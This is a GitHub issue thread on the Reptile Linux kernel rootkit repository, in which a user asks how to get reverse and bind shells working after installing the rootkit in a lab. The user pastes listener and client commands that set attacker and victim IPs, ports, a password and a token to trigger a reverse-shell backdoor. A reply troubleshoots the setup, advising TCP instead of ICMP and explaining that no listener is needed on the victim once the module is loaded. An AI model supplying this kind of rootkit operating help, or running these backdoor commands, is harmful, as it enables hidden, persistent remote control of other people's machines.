f0rb1dd3n / Reptile

LKM Linux rootkit
2.62k stars 578 forks source link

i want about detali usage. #90

Open JUNGJUNCHUL opened 4 years ago

JUNGJUNCHUL commented 4 years ago

hello. i finally install all!!! I am not good at English, so please understand it.

I test in kali-64bit-amd and it work perfect at hiding a process and get a root. but how i can get a bind shell???

attacker ip : 192.168.21.129 server ip : 192.168.21.130

1. --------------------reverse shell---------------------------------------------------- attacker shell : ./listener -p 4444 -s s3cr3t

server shell : ./client set LHOST 192.168.129 set LPORT 4444 set SRCHOST 192.168.22.2 set SRCPORT 11 set RHOST 192.168.21.130 set RPORT 4445 set PORT ICMP set PASS s3cr3t set TOKEN hax0r

    and type!! run ! 

it perfectly run well but in the wireshark show TCP 4444 not a ICMP

  1. ------------------bind shell---------------- how i can get a bind shell??? server shell : ./listener -p 3333 -s s3cr3t

    attackershell : There is no response even when you type the command.


summary

  1. "revershell not work icmp backdoor" it shows tcp
  2. how i use bind shell???
  3. is there any wiki??? about this issue??

thank you for reading. i wait your reply.

LevitatingBusinessMan commented 4 years ago

Use TCP as protocol instead of ICMP. No need to run the listener program on the victim machine if you got the module loaded. Make SRCHOST be the same as LHOST